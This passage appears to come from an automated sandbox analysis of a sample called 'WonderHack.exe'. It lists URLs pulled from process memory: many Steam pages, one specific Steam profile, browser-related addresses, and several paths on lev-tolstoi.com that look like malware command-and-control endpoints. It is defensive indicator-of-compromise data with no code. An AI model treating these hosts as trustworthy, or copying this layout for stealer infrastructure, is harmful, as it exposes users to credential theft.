                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/HU
                    Source: WonderHack.exe, 00000002.00000003.2527263074.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/HU~
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin6
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.comE
                    Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: WonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/((
                    Source: WonderHack.exe, 00000002.00000003.2430190206.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api6M
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apig
                    Source: WonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apit
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/i
                    Source: WonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: WonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453432872.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453505070.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453622723.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453716881.00000000032EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sH
                    Source: WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sY
                    Source: WonderHack.exe, 00000002.00000003.2527263074.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.n
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900%kt
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
